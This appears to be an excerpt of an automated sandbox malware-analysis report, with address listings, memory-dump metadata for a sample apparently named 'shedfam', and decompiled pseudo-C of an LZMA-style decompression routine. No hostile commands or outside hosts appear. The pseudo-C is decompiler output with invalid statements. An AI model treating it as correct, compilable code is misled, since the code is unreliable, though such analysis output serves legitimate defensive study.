0x00000000
0x00406255
0x00000000
0x00406272
0x00406272
0x00406276
0x00406b22
0x00000000
0x00406b22
0x0040627f
0x0040628f
0x00406292
0x00406295
0x00406295
0x00406295
0x00406298
0x0040629c
0x00000000
0x00000000
0x0040629e
0x004062a4
0x004062ce
0x004062d4
0x004062db
0x00000000
0x004062db
0x004062aa
0x004062ad
0x004062b2
0x004062b2
0x004062bd
0x004062c5
0x004062c8
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040630d
0x00406313
0x00406316
0x00406323
0x0040632b
0x00000000
0x00000000
0x004062e2
0x004062e2
0x004062e6
0x00406b31
0x00000000
0x00406b31
0x004062f2
0x004062fd
0x004062fd
0x004062fd
0x00406300
0x00406303
0x00406306
0x0040630b
0x00000000
0x00000000
0x00000000
0x00000000
0x004069a2
0x004069a2
0x004069a8
0x004069ae
0x004069b4
0x004069ce
0x004069d1
0x004069d7
0x004069e2
0x004069e2
0x004069e4
0x004069b6
0x004069b6
0x004069c5
0x004069c9
0x004069c9
0x004069ee
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004069f0
0x004069f4
0x00406ba3
0x00000000
0x00406ba3
0x00406a00
0x00406a07
0x00406a0f
0x00406a12
0x00406a15
0x00406a15
0x00000000
0x00000000
0x00406333
0x00406335
0x00406338
0x004063a9
0x004063ac
0x004063af
0x004063b6
0x004063c0
0x00000000
0x004063c0
0x0040633a
0x0040633e
0x00406341
0x00406343
0x00406346
0x00406349
0x0040634b
0x0040634e
0x00406350
0x00406355
0x00406358
0x0040635b
0x0040635f
0x00406366
0x00406369
0x00406370
0x00406374
0x0040637c
0x0040637c
0x0040637c
0x00406376
0x00406376
0x00406376
0x0040636b
0x0040636b
0x0040636b
0x00406380
0x00406383
0x004063a1
0x004063a3
0x00000000
0x00406385
0x00406385
0x00406388
0x0040638b
0x0040638e
0x00406390
0x00406390
0x00406390
0x00406393
0x00406396
0x00406398
0x00406399
0x0040639c
0x00000000
0x0040639c
0x00000000
0x004065d2
0x004065d6
0x004065f4
0x004065f7
0x004065fe
0x00406601
0x00406604
0x00406607
0x0040660a
0x0040660d
0x0040660f
0x00406616
0x00406617
0x00406619
0x0040661c
0x0040661f
0x00406622
0x00406622
0x00406627
0x00000000
0x00406627
0x004065d8
0x004065db
0x004065de
0x004065e8
0x00000000
0x00000000
0x0040663c
0x00406640
0x00406663
0x00406666
0x00406669
0x00406673
0x00406642
0x00406642
0x00406645
0x00406648
0x0040664b
0x00406658
0x0040665b
0x0040665b
0x00000000
0x00000000
0x0040667f
0x00406683
0x00000000
0x00000000
0x00406689
0x0040668d
0x00000000
0x00000000
0x00406693
0x00406695
0x00406699
0x00406699
0x0040669c
0x004066a0
0x00000000
0x00000000
0x004066f0
0x004066f4
0x004066fb
0x004066fe
0x00406701
0x0040670b
0x00000000
0x0040670b
0x004066f6
0x00000000
0x00000000
0x00406717
0x0040671b
0x00406722
0x00406725
0x00406728
0x0040671d
0x0040671d
0x0040671d
0x0040672b
0x0040672e
0x00406731
0x00406731
0x00406734
0x00406737
0x0040673a
0x0040673a
0x0040673d
0x00406744
0x00406749
0x00000000
0x00000000
0x004067d7
0x004067d7
0x004067db
0x00406b79
0x00000000
0x00406b79
0x004067e1
0x004067e4
0x004067e7
0x004067eb
0x004067ee
0x004067f4
0x004067f6
0x004067f6
0x004067f6
0x004067f9
0x004067fc
0x00000000
0x00000000
0x004063cc
0x004063cc
0x004063d0
0x00406b3d
0x00000000
0x00406b3d
0x004063d6
0x004063d9
0x004063dc
0x004063e0
0x004063e3
0x004063e9
0x004063eb
0x004063eb
0x004063eb
0x004063ee
0x004063f1
0x004063f1
0x004063f4
0x004063f7
0x00000000
0x00000000
0x004063fd
0x00406403
0x00000000
0x00000000
0x00406409
0x00406409
0x0040640d
0x00406410
0x00406413
0x00406416
0x00406419
0x0040641a
0x0040641d
0x0040641f
0x00406425
0x00406428
0x0040642b
0x0040642e
0x00406431
0x00406434
0x00406437
0x00406453
0x00406456
0x00406459
0x0040645c
0x00406463
0x00406467
0x00406469
0x0040646d
0x00406439
0x00406439
0x0040643d
0x00406445
0x0040644a
0x0040644c
0x0040644e
0x0040644e
0x00406470
0x00406477
0x0040647a
0x00000000
0x00406480
0x00000000
0x00406480
0x00000000
0x00406485
0x00406485
0x00406489
0x00406b49
0x00000000
0x00406b49
0x0040648f
0x00406492
0x00406495
0x00406499
0x0040649c
0x004064a2
0x004064a4
0x004064a4
0x004064a4
0x004064a7
0x004064aa
0x004064aa
0x004064aa
0x004064b0
0x00000000
0x00000000
0x004064b2
0x004064b5
0x004064b8
0x004064bb
0x004064be
0x004064c1
0x004064c4
0x004064c7
0x004064ca
0x004064cd
0x004064d0
0x004064e8
0x004064eb
0x004064ee
0x004064f1
0x004064f1
0x004064f4
0x004064f8
0x004064fa
0x004064d2
0x004064d2
0x004064da
0x004064df
0x004064e1
0x004064e3
0x004064e3
0x004064fd
0x00406504
0x00406507
0x00000000
0x00406509
0x00000000
0x00406509
0x00406507
0x0040650e
0x0040650e
0x0040650e
0x0040650e
0x00000000
0x00000000
0x00406549
0x00406549
0x0040654d
0x00406b55
0x00000000
0x00406b55
0x00406553
0x00406556
0x00406559
0x0040655d
0x00406560
0x00406566
0x00406568
0x00406568
0x00406568
0x0040656b
0x0040656e
0x0040656e
0x00406574
0x00406512
0x00406512
0x00406515
0x00000000
0x00406515
0x00406576
0x00406576
0x00406579
0x0040657c
0x0040657f
0x00406582
0x00406585
0x00406588
0x0040658b
0x0040658e
0x00406591
0x00406594
0x004065ac
0x004065af
0x004065b2
0x004065b5
0x004065b5
0x004065b8
0x004065bc
0x004065be
0x00406596
0x00406596
0x0040659e
0x004065a3
0x004065a5
0x004065a7
0x004065a7
0x004065c1
0x004065c8
0x004065cb
0x00000000
0x004065cd
0x00000000
0x004065cd
0x00000000
0x0040685a
0x0040685a
0x0040685e
0x00406b85
0x00000000
0x00406b85
0x00406864
0x00406867
0x0040686a
0x0040686e
0x00406871
0x00406877
0x00406879
0x00406879
0x00406879
0x0040687c
0x00000000
0x00000000
0x0040662a
0x0040662a
0x0040662d
0x0040699f
0x0040699f
0x00000000
0x00000000
0x00000000
0x00000000
0x00406a26
0x00406a2a
0x00406a48
0x00406a48
0x00406a48
0x00406a4f
0x00406a56
0x00000000
0x00406a56
0x00406a2c
0x00406a2f
0x00406a32
0x00406a35
0x00406a3c
0x00000000
0x00000000
0x00406b17
0x00406b1a
0x00406a1b
0x00406a1b
0x00000000
0x00000000
0x00406751
0x00406753
0x0040675a
0x0040675b
0x0040675d
0x00406760
0x00000000
0x00000000
0x00406768
0x0040676b
0x0040676e
0x00406770
0x00406772
0x00406772
0x00406773
0x00406776
0x0040677d
0x00406780
0x0040678e
0x00000000
0x00000000
0x00000000
0x00000000
0x00406a73
0x00406a73
0x00406a77
0x00406baf
0x00000000
0x00406baf
0x00406a7d
0x00406a80
0x00406a83
0x00406a87
0x00406a8a
0x00406a90
0x00406a92
0x00406a92
0x00406a92
0x00406a95
0x00406a98
0x00406a98
0x00406a98
0x00406a98
0x00000000
0x00000000
0x00406796
0x00406799
0x004067cf
0x004068ff
0x004068ff
0x004068ff
0x004068ff
0x00406902
0x00406902
0x00406905
0x00406907
0x00406b91
0x00000000
0x00406b91
0x0040690d
0x00406910
0x00000000
0x00000000
0x00406916
0x0040691a
0x0040691d
0x0040691d
0x0040691d
0x00000000
0x0040691d
0x0040679b
0x0040679d
0x0040679f
0x004067a1
0x004067a4
0x004067a5
0x004067a7
0x004067a9
0x004067ac
0x004067af
0x004067c5
0x004067ca
0x00406802
0x00406802
0x00406806
0x00406832
0x00406834
0x0040683b
0x0040683e
0x00406841
0x00406841
0x00406846
0x00406846
0x00406848
0x0040684b
0x00406852
0x00406855
0x00406882
0x00406882
0x00406885
0x00406888
0x004068fc
0x004068fc
0x004068fc
0x00000000
0x004068fc
0x0040688a
0x00406890
0x00406893
0x00406896
0x00406899
0x0040689c
0x0040689f
0x004068a2
0x004068a5
0x004068a8
0x004068ab
0x004068c4
0x004068c6
0x004068c9
0x004068ca
0x004068cd
0x004068cf
0x004068d2
0x004068d4
0x004068d6
0x004068d9
0x004068db
0x004068de
0x004068e2
0x004068e4
0x004068e4
0x004068e5
0x004068e8
0x004068eb
0x004068ad
0x004068ad
0x004068b5
0x004068ba
0x004068bc
0x004068bf
0x004068bf
0x004068ee
0x004068f5
0x0040687f
0x0040687f
0x0040687f
0x0040687f
0x00000000
0x004068f7
0x00000000
0x004068f7
0x004068f5
0x00406808
0x0040680b
0x0040680d
0x00406810
0x00406813
0x00406816
0x00406818
0x0040681b
0x0040681e
0x0040681e
0x00406821
0x00406821
0x00406824
0x0040682b
0x004067ff
0x004067ff
0x004067ff
0x004067ff
0x00000000
0x0040682d
0x00000000
0x0040682d
0x0040682b
0x004067b1
0x004067b4
0x004067b6
0x004067b9
0x00000000
0x00000000
0x00406518
0x00406518
0x0040651c
0x00406b61
0x00000000
0x00406b61
0x00406522
0x00406525
0x00406528
0x0040652b
0x0040652e
0x00406531
0x00406534
0x00406536
0x00406539
0x0040653c
0x0040653f
0x00406541
0x00406541
0x00406541
0x00000000
0x00000000
0x004066a3
0x004066a3
0x004066a7
0x00406b6d
0x00000000
0x00406b6d
0x004066ad
0x004066b0
0x004066b3
0x004066b6
0x004066b8
0x004066b8
0x004066b8
0x004066bb
0x004066be
0x004066c1
0x004066c4
0x004066c7
0x004066ca
0x004066cb
0x004066cd
0x004066cd
0x004066cd
0x004066d0
0x004066d3
0x004066d6
0x004066d9
0x004066d9
0x004066d9
0x004066dc
0x004066de
0x004066de
0x00000000
0x00000000
0x00406920
0x00406920
0x00406920
0x00406924
0x00000000
0x00000000
0x0040692a
0x0040692d
0x00406930
0x00406933
0x00406935
0x00406935
0x00406935
0x00406938
0x0040693b
0x0040693e
0x00406941
0x00406944
0x00406947
0x00406948
0x0040694a
0x0040694a
0x0040694a
0x0040694d
0x00406950
0x00406953
0x00406956
0x00406959
0x0040695d
0x0040695f
0x00406962
0x00000000
0x00406964
0x004066e1
0x004066e1
0x00000000
0x004066e1
0x00406962
0x00406b97
0x00406bb9
0x00406bbf
0x00406bc1
0x00406bc8
0x00406bca
0x00406bd1
0x00406bd5
0x00000000
0x004061c6
0x00406bce
0x00406bce
0x00000000
0x00406bce
0x00406a1b
0x00406aa1
0x00406aa7
0x00406aaa
0x00406aad
0x00406ab0
0x00406ab3
0x00406ab6
0x00406ab9
0x00406abc
0x00406ac2
0x00406adb
0x00406ade
0x00406ae1
0x00406ae4
0x00406ae8
0x00406aea
0x00406aeb
0x00406aee
0x00406ac4
0x00406ac4
0x00406acc
0x00406ad1
0x00406ad3
0x00406ad6
0x00406ad6
0x00406af8
0x00000000
0x00406afa
0x00000000
0x00406afa
0x00406af8
0x00000000
0x0040696d

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7058ec301ddcf020a4ef3743dba596c5c9d63b88222812e1714b66bbcd5ffa43
Instruction ID: f8b3e10e58f717f8edde5794a38fefd32bea2d44dd320be9cbeb21c60fb05cda
Opcode Fuzzy Hash: 7058ec301ddcf020a4ef3743dba596c5c9d63b88222812e1714b66bbcd5ffa43
Instruction Fuzzy Hash: F5913270E00229CBDF28DF98C8547ADBBB1FB45305F15816ED816BB281C778AA96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 0040667F Relevance: 5.2, APIs: 4, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040667F() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M00406BD6))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
